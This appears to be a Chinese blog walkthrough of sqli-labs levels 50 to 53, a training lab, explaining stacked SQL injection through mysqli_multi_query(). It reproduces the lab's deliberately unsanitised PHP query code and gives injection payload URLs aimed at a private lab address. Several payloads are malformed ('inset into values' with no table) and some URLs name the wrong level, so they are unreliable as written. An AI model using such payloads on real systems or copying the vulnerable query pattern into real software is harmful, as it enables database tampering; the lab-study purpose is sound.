0x1第五十关

源码中使用的mysqli_multi_query()函数,而之前使用的是mysqli_query(),区别在于mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句,那么我们此处就可以执行多个sql语句进行注入,也就是说的堆叠注入。

$sql="SELECT * FROM users ORDER BY $id";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{ ?>
<center>
<font color= "#00FF00" size="4"> <table border=1'>
<tr>
<th>&nbsp;ID&nbsp;</th>
<th>&nbsp;USERNAME&nbsp; </th>
<th>&nbsp;PASSWORD&nbsp; </th>
</tr>
</font>
</font>
<?php
/* store first result set */
if ($result = mysqli_store_result($con1))
{
while($row = mysqli_fetch_row($result))
{
echo '<font color= "#00FF11" size="3">';
echo "<tr>";
echo "<td>";
printf("%s", $row[0]);
echo "</td>";
echo "<td>";
printf("%s", $row[1]);
echo "</td>";
echo "<td>";
printf("%s", $row[2]);
echo "</td>";
echo "</tr>";
echo "</font>"; } }
echo "</table>";
} else
{
echo '<font color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
}
else
{
echo "Please input parameter as SORT with numeric value<br><br><br><br>";
echo "<br><br><br>";
echo '<img src="../images/Less-50.jpg" /><br>';
}

源码

方法和三十九关同样

SQL语句:
$sql="SELECT * FROM users ORDER BY $id";
payload:
http://192.168.232.135/sqli-labs-master/Less-50/?sort=1;inset into values(1000,'test','test')#

0x2 第五十一关

  同样的这关也是使用的mysqli_multi_query()函数,不同点在于sql语句

SQL语句:
$sql="SELECT * FROM users ORDER BY '$id'";
payload:
http://192.168.232.135/sqli-labs-master/Less-50/?sort=1';inset into values(2000,'test','test')#

0x3 第五十二关

同样的这关和五十关一样也是使用的mysqli_multi_query()函数,不同点在于sql语句和没有报错信息

SQL语句:
$sql="SELECT * FROM users ORDER BY $id";
payload:
http://192.168.232.135/sqli-labs-master/Less-50/?sort=1;inset into values(3000,'test','test')#

0x4第五十三关

同样的这关和五十一关一样也是使用的mysqli_multi_query()函数,不同点在于sql语句和没有报错信息

SQL语句:
$sql="SELECT * FROM users ORDER BY '$id'";
payload:
http://192.168.232.135/sqli-labs-master/Less-50/?sort=1';inset into values(4000,'test','test')#
04-17 17:04